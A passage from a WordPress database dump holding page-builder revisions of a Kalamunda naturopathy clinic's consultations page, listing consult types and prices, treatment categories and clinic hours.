5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-24 13:11:54','2021-05-24 05:11:54','',28,'https://verde.desidrivers.com.au/?p=107',0,'revision','',0),(122,1,'2021-05-25 10:05:22','2021-05-25 02:05:22','','3-01','','inherit','open','closed','','3-01-2','','','2021-05-25 10:05:22','2021-05-25 02:05:22','',0,'https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png',0,'attachment','image/png',0),(130,1,'2021-05-25 11:08:53','2021-05-25 03:08:53','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||5px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" custom_padding=\"7px|||||\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"1-01\" align=\"center\" background_color=\"#ccd4c8\" hover_enabled=\"0\" sticky_enabled=\"0\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"3-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb image_last_edited=\"off|tablet\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_blurb][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"2-01\" align=\"center\" custom_padding=\"30px||30px||false|false\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_5\" _builder_version=\"4.9.4\" _module_preset=\"default\"][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"3-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li>Capsules/tablets<span style=\"font-family: Montserrat;\"></span></li>\n<li>Teas</li>\n<li>Topical creams</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"4-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Food as medicine</span></li>\n<li><span style=\"font-family: Montserrat;\">Nutritional compounds</span></li>\n<li><span style=\"font-family: Montserrat;\">Supplements</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" title_text=\"5-01\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"2-01\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_image=\"off\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 11:08:53','2021-05-25 03:08:53','',28,'https://verde.desidrivers.com.au/?p=130',0,'revision','',0),(128,1,'2021-05-25 11:07:32','2021-05-25 03:07:32','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat,Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"> Consultations</span></h1>\n<p><span style=\"font-family: Montserrat;\">Choose from face-to-face and online Zoom consults.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" hover_enabled=\"0\" custom_padding=\"7px|||||\" sticky_enabled=\"0\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01.png\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"1-01\" align=\"center\" background_color=\"#ccd4c8\" hover_enabled=\"0\" sticky_enabled=\"0\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" title_text=\"1-01 crop\" module_alignment=\"center\" use_icon=\"on\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, 